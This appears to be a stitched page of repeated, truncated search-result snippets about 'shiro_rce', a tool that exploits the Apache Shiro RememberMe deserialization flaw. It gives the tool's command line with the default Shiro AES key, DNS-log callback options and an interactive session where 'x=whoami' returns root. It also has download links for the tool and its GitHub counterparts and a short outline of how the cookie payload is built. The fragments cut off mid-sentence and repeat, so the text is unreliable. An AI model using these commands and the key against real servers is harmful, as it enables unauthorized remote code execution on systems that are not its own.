shiro_rce java -cp shiro_tool.jar Shiro https://xx.xx.xx.xx nslookup/ping1/ping2/curl nocheck key=kPH+bIxk5D2deZiIxcaaaA== req=1.txt keys=key.txt nslookup/ping1/ping2/curl--> use nslookup dnslog.com check./use ping -c 1 dnslog.com check(default)./use ping -n 1 dnslog.com...
skip -->all gadget default can be use randomagent -->random useragentuseragent=-->setuseragentcookiename=-->default: rememberMe 不是rememberMe的时候用x=-->print resultcmd=-->setcommandto rundcmd=-->setcommandto run,commandformatbase64 stringkey=-->seta shiro keyreq=-->request bodyfilerequ...
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2020-10-16: 放出来一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测是否shiro, java -cp shiro_tool.jar shiro.Check http://url 或者 java -cp shiro_tool.jar shiro.Check urls=文件 3、目标...
[-] please entercommand, enter q or quit to quit, enter back to re-choose gadget > x=whoami root [-] please entercommand, enter q or quit to quit, enter back to re-choose gadget > quit [-] start processcommand: quit [-] quit...
毫无实践经验的感觉shiro在渗透时用的还是挺广的,化身脚本小子试了几个shiro利用工具感觉还是shiro-1.2.4-rce最好用,靶场起的开头的docker作者的描述其实很少,翻了下python脚本跟上面的流程一样,从yeso里得到payload编码base64放进remmenberMe的cookie里然后request.get(所以为什么自己试的时候没成,估计还是环境没配好...
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。 那么,Payload产生的过程: 命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值 ...
shiro_rce 声明: 此工具仅用于企业安全人员自查验证自身企业资产的安全风险,或有合法授权的安全测试,请勿用于其他用途,如有,后果自负。 download_url:https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar 优化一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测...
[-] please enter command, enter q or quit to quit, enter back to re-choose gadget> quit[-] start process command: quit[-] quit 工具下载 https://github.com/altEr1125/ShiroAttack2 https://github.com/SummerSec/ShiroAttack https://github.com/wyzxxz/shiro_rce_tool ...
shiro_rce 声明: 此工具仅用于企业安全人员自查验证自身企业资产的安全风险,或有合法授权的安全测试,请勿用于其他用途,如有,后果自负。 download_url:https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar 优化一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测...